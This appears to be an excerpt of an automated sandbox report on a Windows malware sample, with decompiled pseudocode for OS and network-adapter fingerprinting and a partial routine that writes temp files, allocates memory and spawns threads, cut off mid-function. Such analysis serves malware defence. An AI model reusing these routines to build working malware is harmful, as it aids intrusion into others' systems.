                                                                                                                                                                                                                                                                          0x04009f94
                                                                                                                                                                                                                                                                          0x04009fad
                                                                                                                                                                                                                                                                          0x04009fb2
                                                                                                                                                                                                                                                                          0x04009fb5
                                                                                                                                                                                                                                                                          0x04009fbb
                                                                                                                                                                                                                                                                          0x04009fc2
                                                                                                                                                                                                                                                                          0x04009fcb
                                                                                                                                                                                                                                                                          0x04009fe0
                                                                                                                                                                                                                                                                          0x04009fe6
                                                                                                                                                                                                                                                                          0x04009fe7
                                                                                                                                                                                                                                                                          0x04009fea
                                                                                                                                                                                                                                                                          0x04009feb
                                                                                                                                                                                                                                                                          0x04009ff2
                                                                                                                                                                                                                                                                          0x04009ff4
                                                                                                                                                                                                                                                                          0x04009ffb
                                                                                                                                                                                                                                                                          0x0400a018
                                                                                                                                                                                                                                                                          0x0400a034
                                                                                                                                                                                                                                                                          0x0400a039
                                                                                                                                                                                                                                                                          0x0400a048
                                                                                                                                                                                                                                                                          0x0400a050
                                                                                                                                                                                                                                                                          0x0400a053
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400a05e
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400a018
                                                                                                                                                                                                                                                                          0x0400a066
                                                                                                                                                                                                                                                                          0x0400a066
                                                                                                                                                                                                                                                                          0x0400a06b
                                                                                                                                                                                                                                                                          0x0400a072
                                                                                                                                                                                                                                                                          0x0400a077
                                                                                                                                                                                                                                                                          0x04009fc2
                                                                                                                                                                                                                                                                          0x04009f8b
                                                                                                                                                                                                                                                                          0x0400a080

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 040097A0: GetProcessHeap.KERNEL32(00000008,04009FB2,?,04009FB2,00000000,?,?,?,04009E2D), ref: 040097A9
                                                                                                                                                                                                                                                                            • Part of subcall function 040097A0: RtlAllocateHeap.NTDLL(00000000,?,04009FB2,00000000,?,?,?,04009E2D), ref: 040097B0
                                                                                                                                                                                                                                                                          • GetAdaptersInfo.IPHLPAPI(00000000,04009E2D), ref: 04009FEB
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.599674473.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.599568479.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600041047.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600183506.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Heap$AdaptersAllocateInfoProcess
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1318000056-0
                                                                                                                                                                                                                                                                          • Opcode ID: 73ff96f27f52de9840d8f092c1af349ff5175d9842f98ddb7f52f1a4bac05a00
                                                                                                                                                                                                                                                                          • Instruction ID: 97f005e152f21f2c2f7fd10924b0caa403664ba6d1ad8a9a516f1bf18f754b30
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 73ff96f27f52de9840d8f092c1af349ff5175d9842f98ddb7f52f1a4bac05a00
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B931FBB5E00209EFEB04CF98C494AEEB7B5EF48308F10C169E909A7390D735AA45CF51
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 204 4008f80-4008f94 205 4008f9a-4008f9e 204->205 206 400927b-4009281 204->206 205->206 207 4008fa4-4008fa8 205->207 207->206 208 4008fae-4008fff call 4007d20 * 3 GetVersionExA 207->208 215 4009005-4009016 GetSystemInfo 208->215 216 4009266-400926a 208->216 217 4009115-400911c 215->217 218 400901c-4009023 215->218 216->206 219 400926c-4009275 lstrcatA 216->219 220 4009210-4009217 call 4009290 217->220 221 4009122-4009129 217->221 222 4009042-4009049 218->222 223 4009025-400903d lstrcatA 218->223 219->206 239 4009228-4009237 lstrlenA 220->239 240 4009219-4009222 lstrcatA 220->240 224 4009174-400917b 221->224 225 400912b-4009132 221->225 228 4009068-400906f 222->228 229 400904b-4009063 lstrcatA 222->229 227 4009110 223->227 234 40091c3-40091ca 224->234 235 400917d-4009184 224->235 230 4009134-400914c lstrcatA 225->230 231 400914e-4009155 225->231 227->220 228->227 233 4009075-400907c 228->233 229->227 237 400916f 230->237 231->237 238 4009157-4009169 lstrcatA 231->238 241 40090a1-40090ab GetSystemMetrics 233->241 242 400907e-4009085 233->242 234->220 236 40091cc-40091d3 234->236 243 40091a0-40091a7 235->243 244 4009186-400919e lstrcatA 235->244 247 40091d5-40091ed lstrcatA 236->247 248 40091ef-40091f6 236->248 237->220 238->237 249 4009259-4009263 lstrlenA 239->249 250 4009239-4009253 lstrcatA * 2 239->250 240->239 252 40090c7-40090d1 GetSystemMetrics 241->252 253 40090ad-40090c5 lstrcatA 241->253 242->241 251 4009087-400909f lstrcatA 242->251 245 40091c1 243->245 246 40091a9-40091bb lstrcatA 243->246 244->245 245->220 246->245 247->220 248->220 256 40091f8-400920a lstrcatA 248->256 249->216 250->249 251->227 254 40090d3-40090eb lstrcatA 252->254 255 40090ed-40090f6 252->255 253->227 254->227 255->227 257 40090f8-400910a lstrcatA 255->257 256->220 257->227
                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04008F80(CHAR* _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                                                                          				struct _SYSTEM_INFO _v44;
                                                                                                                                                                                                                                                                          				signed int _v50;
                                                                                                                                                                                                                                                                          				signed short _v52;
                                                                                                                                                                                                                                                                          				struct _OSVERSIONINFOA _v204;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0 || _a12 == 0) {
                                                                                                                                                                                                                                                                          					L45:
                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					E04007D20(E04007D20(_a8, _a4, 0, _a8),  &_v204, 0, 0x9c);
                                                                                                                                                                                                                                                                          					_v204.dwOSVersionInfoSize = 0x9c;
                                                                                                                                                                                                                                                                          					E04007D20( &_v44,  &_v44, 0, 0x24);
                                                                                                                                                                                                                                                                          					if(GetVersionExA( &_v204) == 0) {
                                                                                                                                                                                                                                                                          						L43:
                                                                                                                                                                                                                                                                          						if(_v8 == 0) {
                                                                                                                                                                                                                                                                          							lstrcatA(_a4, "UndefinedOS");
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						goto L45;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					GetSystemInfo( &_v44); // executed
                                                                                                                                                                                                                                                                          					if(_v204.dwMajorVersion != 5) {
                                                                                                                                                                                                                                                                          						if(_v204.dwMajorVersion == 6) {
                                                                                                                                                                                                                                                                          							if(_v204.dwMinorVersion != 0) {
                                                                                                                                                                                                                                                                          								if(_v204.dwMinorVersion != 1) {
                                                                                                                                                                                                                                                                          									if(_v204.dwMinorVersion == 2) {
                                                                                                                                                                                                                                                                          										if((_v50 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                                          											if((_v50 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                                          												lstrcatA(_a4, "Win8");
                                                                                                                                                                                                                                                                          												 *_a12 = 0xb;
                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                          											lstrcatA(_a4, "WinServer2012");
                                                                                                                                                                                                                                                                          											 *_a12 = 0xc;
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          									if((_v50 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                                          										if((_v50 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                                          											lstrcatA(_a4, "Win7");
                                                                                                                                                                                                                                                                          											 *_a12 = 8;
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                          										lstrcatA(_a4, "WinServer2008R2");
                                                                                                                                                                                                                                                                          										 *_a12 = 0xa;
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                          								if((_v50 & 0x000000ff) != 1) {
                                                                                                                                                                                                                                                                          									if((_v50 & 0x000000ff) != 1) {
                                                                                                                                                                                                                                                                          										lstrcatA(_a4, "WinServer2008");
                                                                                                                                                                                                                                                                          										 *_a12 = 9;
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          									lstrcatA(_a4, "Vista");
                                                                                                                                                                                                                                                                          									 *_a12 = 7;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						L38:
                                                                                                                                                                                                                                                                          						if(E04009290() != 0) {
                                                                                                                                                                                                                                                                          							lstrcatA(_a4, "_x64");
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						if(lstrlenA( &(_v204.szCSDVersion)) != 0) {
                                                                                                                                                                                                                                                                          							lstrcatA(_a4, "_");
                                                                                                                                                                                                                                                                          							lstrcatA(_a4,  &(_v204.szCSDVersion));
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_v8 = lstrlenA(_a4);
                                                                                                                                                                                                                                                                          						goto L43;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(_v204.dwMinorVersion != 0) {
                                                                                                                                                                                                                                                                          						if(_v204.dwMinorVersion != 1) {
                                                                                                                                                                                                                                                                          							if(_v204.dwMinorVersion == 2) {
                                                                                                                                                                                                                                                                          								if((_v50 & 0x000000ff) != 1 || (_v44.dwOemId & 0x0000ffff) != 9) {
                                                                                                                                                                                                                                                                          									if(GetSystemMetrics(0x59) != 0) {
                                                                                                                                                                                                                                                                          										if(GetSystemMetrics(0x59) == 0) {
                                                                                                                                                                                                                                                                          											if((_v52 & 0x8000) != 0) {
                                                                                                                                                                                                                                                                          												lstrcatA(_a4, "WinHomeServer");
                                                                                                                                                                                                                                                                          												 *_a12 = 4;
                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                          											lstrcatA(_a4, "WinServer2003R2");
                                                                                                                                                                                                                                                                          											 *_a12 = 6;
                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                          										lstrcatA(_a4, "WinServer2003");
                                                                                                                                                                                                                                                                          										 *_a12 = 5;
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          									lstrcatA(_a4, "WinXP64");
                                                                                                                                                                                                                                                                          									 *_a12 = 3;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                          							lstrcatA(_a4, "WinXP");
                                                                                                                                                                                                                                                                          							 *_a12 = 2;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                          						lstrcatA(_a4, "Win2K");
                                                                                                                                                                                                                                                                          						 *_a12 = 1;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					goto L38;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}








                                                                                                                                                                                                                                                                          0x04008f89
                                                                                                                                                                                                                                                                          0x04008f94
                                                                                                                                                                                                                                                                          0x0400927b
                                                                                                                                                                                                                                                                          0x04009281
                                                                                                                                                                                                                                                                          0x04008fae
                                                                                                                                                                                                                                                                          0x04008fce
                                                                                                                                                                                                                                                                          0x04008fd6
                                                                                                                                                                                                                                                                          0x04008fe8
                                                                                                                                                                                                                                                                          0x04008fff
                                                                                                                                                                                                                                                                          0x04009266
                                                                                                                                                                                                                                                                          0x0400926a
                                                                                                                                                                                                                                                                          0x04009275
                                                                                                                                                                                                                                                                          0x04009275
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400926a
                                                                                                                                                                                                                                                                          0x04009009
                                                                                                                                                                                                                                                                          0x04009016
                                                                                                                                                                                                                                                                          0x0400911c
                                                                                                                                                                                                                                                                          0x04009129
                                                                                                                                                                                                                                                                          0x0400917b
                                                                                                                                                                                                                                                                          0x040091ca
                                                                                                                                                                                                                                                                          0x040091d3
                                                                                                                                                                                                                                                                          0x040091f6
                                                                                                                                                                                                                                                                          0x04009201
                                                                                                                                                                                                                                                                          0x0400920a
                                                                                                                                                                                                                                                                          0x0400920a
                                                                                                                                                                                                                                                                          0x040091d5
                                                                                                                                                                                                                                                                          0x040091de
                                                                                                                                                                                                                                                                          0x040091e7
                                                                                                                                                                                                                                                                          0x040091e7
                                                                                                                                                                                                                                                                          0x040091d3
                                                                                                                                                                                                                                                                          0x0400917d
                                                                                                                                                                                                                                                                          0x04009184
                                                                                                                                                                                                                                                                          0x040091a7
                                                                                                                                                                                                                                                                          0x040091b2
                                                                                                                                                                                                                                                                          0x040091bb
                                                                                                                                                                                                                                                                          0x040091bb
                                                                                                                                                                                                                                                                          0x04009186
                                                                                                                                                                                                                                                                          0x0400918f
                                                                                                                                                                                                                                                                          0x04009198
                                                                                                                                                                                                                                                                          0x04009198
                                                                                                                                                                                                                                                                          0x040091c1
                                                                                                                                                                                                                                                                          0x0400912b
                                                                                                                                                                                                                                                                          0x04009132
                                                                                                                                                                                                                                                                          0x04009155
                                                                                                                                                                                                                                                                          0x04009160
                                                                                                                                                                                                                                                                          0x04009169
                                                                                                                                                                                                                                                                          0x04009169
                                                                                                                                                                                                                                                                          0x04009134
                                                                                                                                                                                                                                                                          0x0400913d
                                                                                                                                                                                                                                                                          0x04009146
                                                                                                                                                                                                                                                                          0x04009146
                                                                                                                                                                                                                                                                          0x0400916f
                                                                                                                                                                                                                                                                          0x04009129
                                                                                                                                                                                                                                                                          0x04009210
                                                                                                                                                                                                                                                                          0x04009217
                                                                                                                                                                                                                                                                          0x04009222
                                                                                                                                                                                                                                                                          0x04009222
                                                                                                                                                                                                                                                                          0x04009237
                                                                                                                                                                                                                                                                          0x04009242
                                                                                                                                                                                                                                                                          0x04009253
                                                                                                                                                                                                                                                                          0x04009253
                                                                                                                                                                                                                                                                          0x04009263
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04009263
                                                                                                                                                                                                                                                                          0x04009023
                                                                                                                                                                                                                                                                          0x04009049
                                                                                                                                                                                                                                                                          0x0400906f
                                                                                                                                                                                                                                                                          0x0400907c
                                                                                                                                                                                                                                                                          0x040090ab
                                                                                                                                                                                                                                                                          0x040090d1
                                                                                                                                                                                                                                                                          0x040090f6
                                                                                                                                                                                                                                                                          0x04009101
                                                                                                                                                                                                                                                                          0x0400910a
                                                                                                                                                                                                                                                                          0x0400910a
                                                                                                                                                                                                                                                                          0x040090d3
                                                                                                                                                                                                                                                                          0x040090dc
                                                                                                                                                                                                                                                                          0x040090e5
                                                                                                                                                                                                                                                                          0x040090e5
                                                                                                                                                                                                                                                                          0x040090ad
                                                                                                                                                                                                                                                                          0x040090b6
                                                                                                                                                                                                                                                                          0x040090bf
                                                                                                                                                                                                                                                                          0x040090bf
                                                                                                                                                                                                                                                                          0x04009087
                                                                                                                                                                                                                                                                          0x04009090
                                                                                                                                                                                                                                                                          0x04009099
                                                                                                                                                                                                                                                                          0x04009099
                                                                                                                                                                                                                                                                          0x0400907c
                                                                                                                                                                                                                                                                          0x0400904b
                                                                                                                                                                                                                                                                          0x04009054
                                                                                                                                                                                                                                                                          0x0400905d
                                                                                                                                                                                                                                                                          0x0400905d
                                                                                                                                                                                                                                                                          0x04009025
                                                                                                                                                                                                                                                                          0x0400902e
                                                                                                                                                                                                                                                                          0x04009037
                                                                                                                                                                                                                                                                          0x04009037
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04009110

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetVersionExA.KERNEL32(0000009C), ref: 04008FF7
                                                                                                                                                                                                                                                                          • GetSystemInfo.KERNEL32(?), ref: 04009009
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,Win2K), ref: 0400902E
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,WinXP), ref: 04009054
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,Vista), ref: 0400913D
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,WinServer2008), ref: 04009160
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,WinServer2008R2), ref: 0400918F
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,Win7), ref: 040091B2
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,WinServer2012), ref: 040091DE
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,Win8), ref: 04009201
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,_x64), ref: 04009222
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 0400922F
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,0400C980), ref: 04009242
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,?), ref: 04009253
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 0400925D
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000000,UndefinedOS), ref: 04009275
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.599674473.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.599568479.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600041047.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.600183506.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: lstrcat$lstrlen$InfoSystemVersion
                                                                                                                                                                                                                                                                          • String ID: UndefinedOS$Vista$Win2K$Win7$Win8$WinHomeServer$WinServer2003$WinServer2003R2$WinServer2008$WinServer2008R2$WinServer2012$WinXP$WinXP64$_x64
                                                                                                                                                                                                                                                                          • API String ID: 3139318632-332591429
                                                                                                                                                                                                                                                                          • Opcode ID: b80c610fb93e26c1f6b8a0e3d57eccb9ead3b078b5df3064abf97d281ea2cf4c
                                                                                                                                                                                                                                                                          • Instruction ID: 2fdea20511d00b83c143a5217ffb9651c4d2114897e9ccdf2931e29d93762e72
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b80c610fb93e26c1f6b8a0e3d57eccb9ead3b078b5df3064abf97d281ea2cf4c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A81F9B4644209EBFB249F60C849BAE7BB5FB49301F00C659F905BA2C1D779E9C1CB61
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 298 40062b0-40062c4 299 40062ca-40062ce 298->299 300 4006c4e 298->300 299->300 302 40062d4-40062e0 299->302 301 4006c51-4006c54 300->301 302->300 303 40062e6-40062ed 302->303 303->300 304 40062f3-4006314 303->304 306 400631a-400631e 304->306 307 400642e-4006453 304->307 309 4006320-400633a 306->309 310 4006343-4006363 306->310 313 4006459-400645d 307->313 314 4006c2f-4006c36 307->314 309->310 315 400633c-400633e 309->315 311 4006429 310->311 312 4006369-4006375 310->312 311->307 312->311 316 400637b-4006384 312->316 319 4006482-40064a2 313->319 320 400645f-4006479 313->320 317 4006c44 314->317 318 4006c38-4006c42 314->318 315->301 316->311 321 400638a-4006393 316->321 317->300 318->300 322 40065f3-40065fc 319->322 323 40064a8-40064b4 319->323 320->319 324 400647b-400647d 320->324 321->311 325 4006399-40063a2 321->325 327 4006603-400660f 322->327 328 40065fe 322->328 323->322 326 40064ba-400654c GetEnvironmentVariableA call 4007d20 call 4009730 GetTickCount GetTempFileNameA CreateFileA 323->326 324->301 331 4006410-4006424 call 4001ee0 325->331 332 40063a4-40063ca VirtualAlloc 325->332 326->322 353 4006552-4006586 WriteFile 326->353 329 4006615-4006621 327->329 330 4006bdd-4006be9 327->330 328->327 329->330 334 4006627-4006640 call 4007250 329->334 337 4006c18-4006c24 330->337 338 4006beb-4006bf7 330->338 345 4006427 331->345 335 40063cc-40063e4 call 4006260 332->335 336 400640e 332->336 354 4006642 334->354 355 4006647-400664e 334->355 356 40063e6-40063fa call 4001ee0 335->356 357 40063fd-4006408 VirtualFree 335->357 336->345 346 4006c26 337->346 347 4006c2a 337->347 338->337 344 4006bf9-4006c16 call 400a360 338->344 344->347 345->307 346->347 347->314 359 4006588-4006591 353->359 360 40065dd-40065e4 353->360 354->355 361 4006752-400675b 355->361 362 4006654-4006674 VirtualAlloc 355->362 356->357 357->336 359->360 366 4006593-40065c7 CloseHandle call 4006c60 call 4001e60 359->366 360->322 369 40065e6-40065ed CloseHandle 360->369 364 4006761-4006788 361->364 365 40069ba-4006a49 GetEnvironmentVariableA call 4007d20 call 4009730 GetTickCount GetTempFileNameA CreateFileA 361->365 362->361 367 400667a-4006747 call 4007b70 call 40097a0 CreateThread CloseHandle 362->367 370 4006858-4006864 call 4002070 364->370 371 400678e-40067c0 VirtualAlloc 364->371 399 4006bd6 365->399 400 4006a4f-4006a75 365->400 397 40065d8 call 4006cf0 366->397 398 40065c9-40065d0 call 40074a0 ExitProcess 366->398 367->361 369->322 386 400686a-4006871 370->386 375 4006856 371->375 376 40067c6-40067e7 call 4006260 371->376 375->386 395 4006842-4006850 VirtualFree 376->395 396 40067e9-4006807 call 4002070 376->396 387 40069b0 386->387 388 4006877-400687e 386->388 387->365 393 4006880-4006891 call 40073c0 388->393 394 4006894-400689d 388->394 393->394 402 40068a3-40068c8 call 40097a0 394->402 403 400698a-4006993 394->403 395->375 396->395 423 4006809-400683a VirtualAlloc call 4007b70 396->423 397->360 399->330 407 4006a7b-4006aad VirtualAlloc 400->407 408 4006b1e-4006b3c WriteFile 400->408 427 40068e9-400690d VirtualAlloc 402->427 428 40068ca-40068e7 402->428 409 4006995-40069a6 call 4002510 403->409 410 40069a9 403->410 416 4006b1c 407->416 417 4006aaf-4006ad0 call 4006260 407->417 412 4006b42-4006b49 408->412 409->410 410->387 420 4006bc9-4006bd0 CloseHandle 412->420 421 4006b4b-4006b57 412->421 416->412 430 4006ad2-4006b02 WriteFile 417->430 431 4006b08-4006b16 VirtualFree 417->431 420->399 421->420 426 4006b59-4006b82 CloseHandle call 4001e60 421->426 434 400683f 423->434 439 4006b84-4006b8b 426->439 440 4006bc7 426->440 433 4006934-400693d 427->433 435 400690f-4006931 call 4007b70 427->435 428->433 430->431 431->416 433->403 436 400693f-4006984 CreateThread CloseHandle 433->436 434->395 435->433 436->403 442 4006ba1-4006baa 439->442 443 4006b8d-4006b9e call 40073c0 439->443 440->399 444 4006bc0 442->444 445 4006bac-4006bbd call 4002510 442->445 443->442 444->440 445->444
                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E040062B0(intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                                                          				signed int _v13;
                                                                                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                                                                                          				int _v24;
                                                                                                                                                                                                                                                                          				intOrPtr _v28;
                                                                                                                                                                                                                                                                          				intOrPtr _v32;
                                                                                                                                                                                                                                                                          				void _v36;
                                                                                                                                                                                                                                                                          				void* _v40;
                                                                                                                                                                                                                                                                          				long _v44;
                                                                                                                                                                                                                                                                          				signed int _v48;
                                                                                                                                                                                                                                                                          				void* _v52;
                                                                                                                                                                                                                                                                          				long _v56;
                                                                                                                                                                                                                                                                          				void _v60;
                                                                                                                                                                                                                                                                          				char _v324;
                                                                                                                                                                                                                                                                          				void* _v328;
                                                                                                                                                                                                                                                                          				char _v340;
                                                                                                                                                                                                                                                                          				char _v604;
                                                                                                                                                                                                                                                                          				int _v608;
                                                                                                                                                                                                                                                                          				long _v612;
                                                                                                                                                                                                                                                                          				signed int _v616;
                                                                                                                                                                                                                                                                          				void* _v620;
                                                                                                                                                                                                                                                                          				void* _v624;
                                                                                                                                                                                                                                                                          				void* _v628;
                                                                                                                                                                                                                                                                          				int _v632;
                                                                                                                                                                                                                                                                          				signed int _v636;
                                                                                                                                                                                                                                                                          				long _v640;
                                                                                                                                                                                                                                                                          				void* _v644;
                                                                                                                                                                                                                                                                          				void* _v648;
                                                                                                                                                                                                                                                                          				void* _v652;
                                                                                                                                                                                                                                                                          				char _v916;
                                                                                                                                                                                                                                                                          				void* _v920;
                                                                                                                                                                                                                                                                          				char _v932;
                                                                                                                                                                                                                                                                          				char _v1196;
                                                                                                                                                                                                                                                                          				long _v1200;
                                                                                                                                                                                                                                                                          				int _v1204;
                                                                                                                                                                                                                                                                          				long _v1208;
                                                                                                                                                                                                                                                                          				void* _v1212;
                                                                                                                                                                                                                                                                          				long _v1216;
                                                                                                                                                                                                                                                                          				signed int _v1220;
                                                                                                                                                                                                                                                                          				void* _v1224;
                                                                                                                                                                                                                                                                          				void* _v1228;
                                                                                                                                                                                                                                                                          				intOrPtr _t317;
                                                                                                                                                                                                                                                                          				signed char _t321;
                                                                                                                                                                                                                                                                          				void* _t333;
                                                                                                                                                                                                                                                                          				signed int _t340;
                                                                                                                                                                                                                                                                          				void* _t349;
                                                                                                                                                                                                                                                                          				signed int _t355;
                                                                                                                                                                                                                                                                          				void* _t361;
                                                                                                                                                                                                                                                                          				void* _t368;
                                                                                                                                                                                                                                                                          				void* _t378;
                                                                                                                                                                                                                                                                          				void* _t381;
                                                                                                                                                                                                                                                                          				signed int _t383;
                                                                                                                                                                                                                                                                          				void* _t386;
                                                                                                                                                                                                                                                                          				void* _t393;
                                                                                                                                                                                                                                                                          				int _t415;
                                                                                                                                                                                                                                                                          				signed int _t421;
                                                                                                                                                                                                                                                                          				signed int _t428;
                                                                                                                                                                                                                                                                          				signed char _t433;
                                                                                                                                                                                                                                                                          				void* _t439;
                                                                                                                                                                                                                                                                          				signed char _t442;
                                                                                                                                                                                                                                                                          				void* _t448;
                                                                                                                                                                                                                                                                          				signed int _t452;
                                                                                                                                                                                                                                                                          				intOrPtr _t455;
                                                                                                                                                                                                                                                                          				void* _t465;
                                                                                                                                                                                                                                                                          				void* _t472;
                                                                                                                                                                                                                                                                          				void* _t473;
                                                                                                                                                                                                                                                                          				void* _t508;
                                                                                                                                                                                                                                                                          				void* _t509;
                                                                                                                                                                                                                                                                          				void* _t528;
                                                                                                                                                                                                                                                                          				void* _t529;
                                                                                                                                                                                                                                                                          				void* _t539;
                                                                                                                                                                                                                                                                          				void* _t549;
                                                                                                                                                                                                                                                                          				void* _t550;
                                                                                                                                                                                                                                                                          				void* _t551;
                                                                                                                                                                                                                                                                          				void* _t563;
                                                                                                                                                                                                                                                                          				void* _t598;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0) {
                                                                                                                                                                                                                                                                          					L99:
                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					_v12 =  *_a4;
                                                                                                                                                                                                                                                                          					if(_v12 > 0 && _v12 < 0x400) {
                                                                                                                                                                                                                                                                          						_v20 = _a4 + 4;
                                                                                                                                                                                                                                                                          						_v24 = 0;
                                                                                                                                                                                                                                                                          						while(_v24 < _v12) {
                                                                                                                                                                                                                                                                          							if(_v24 <= 0) {
                                                                                                                                                                                                                                                                          								L10:
                                                                                                                                                                                                                                                                          								_v28 = _v20 + 0x18;
                                                                                                                                                                                                                                                                          								_v32 =  *_v20 - 0x18;
                                                                                                                                                                                                                                                                          								__eflags =  *((intOrPtr*)(_v20 + 4)) -  *0x400e270; // 0x1
                                                                                                                                                                                                                                                                          								if(__eflags != 0) {
                                                                                                                                                                                                                                                                          									L22:
